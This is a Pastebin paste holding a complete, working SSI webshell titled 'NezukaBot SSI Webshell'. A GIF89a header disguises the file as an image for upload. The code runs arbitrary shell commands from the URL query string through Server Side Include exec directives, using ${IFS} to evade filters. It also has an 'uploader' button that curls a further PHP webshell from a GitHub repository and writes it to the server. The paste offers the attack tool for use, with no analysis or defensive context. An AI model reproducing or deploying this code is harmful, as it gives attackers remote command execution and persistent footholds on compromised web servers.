Advertisement
blackhat1337

Untitled

Feb 8th, 2024
89
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.36 KB | None | 0 0
  1. GIF89a;
  2. <!--#config errmsg="Function SSI Disabled"-->
  3. <!--#set var="zero" value="" -->
  4. <!--#if expr="$QUERY_STRING_UNESCAPED = \$zero" -->
  5. <!--#set var="shl" value="whoami" -->
  6. <!--#else -->
  7. <!--#set var="shl" value=$QUERY_STRING_UNESCAPED -->
  8. <!--#endif -->
  9. <!DOCTYPE html>
  10. <html>
  11. <head>
  12. <title>NezukaBot SSI Webshell</title>
  13. <script src="https://ajax.googleapis.com/ajax/libs/jquery/2.1.1/jquery.min.js"></script>
  14. <script language="javascript">
  15. function nezcmd()
  16. {
  17. var uri = document.getElementById('command').value;
  18. var rep = uri.replace(/[ ]/g,'${IFS}');
  19. var res = encodeURI(uri);
  20. document.location.href="<!--#echo var=DOCUMENT_NAME -->?"+encodeURI(rep);
  21. }
  22.  
  23. function addupload()
  24. {
  25. document.location.href="<!--#echo var=DOCUMENT_NAME -->?"+"curl${IFS}-Ls${IFS}raw.githubusercontent.com/AzhariKun/webshell/main/nez.php${IFS}|${IFS}tee${IFS}-a${IFS}nez.php";
  26. }
  27. </script>
  28. <style type="text/css">
  29. .input {
  30. background: transparent;
  31. border-color: #ffffff;
  32. border-width: thin;
  33. border: groove;
  34. cursor: pointer;
  35. }
  36.  
  37. button {
  38. cursor: pointer;
  39. }
  40. </style>
  41. </head>
  42. <b><font face="courier" size="4"><i>NezukaBot SSI Webshell</font></b><font face="courier">
  43. <br><br>System : <b><!--#exec cmd="{uname,-nrv}" --></b>
  44. <br>Current Path : <b><!--#echo var=DOCUMENT_ROOT --></b></i><br><br>
  45. MySql : <b><!--#exec cmd="{test,-e,/usr/bin/mysql}&&{echo,ON}||{echo,OFF}" --></b>&nbsp;|&nbsp; Wget : <b><!--#exec cmd="{test,-e,/usr/bin/wget}&&{echo,ON}||{echo,OFF}" --></b></b>&nbsp;|&nbsp; Curl : <b><!--#exec cmd="{test,-e,/usr/bin/curl}&&{echo,ON}||{echo,OFF}" --></b><br>
  46. <font> COMMAND : <input type="text" size="30" id="command" class="text" name="address1" style="max-width: 100%; max-height: 100%;">&nbsp;<button class="input" id="gas" onclick="nezcmd();">execute</button> <button class="input" id="gas" onclick="addupload();">uploader</button><br><br>
  47. Executed Command : </font><b><font face="courier" id="cmd"><!--#echo var=shl --></font></b></i>
  48. <pre><!--#exec cmd=$shl --></pre>
  49. <script>
  50. var cmd = document.getElementById("cmd").innerHTML.split("${IFS}").join(" ");
  51. document.getElementById("cmd").innerHTML = cmd;
  52. var gaskan = document.getElementById("command");
  53. gaskan.addEventListener("keyup", function(event) {
  54. if (event.keyCode === 13) {
  55. event.preventDefault();
  56. document.getElementById("gas").click();
  57. }
  58. });
  59. </script>
  60. </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement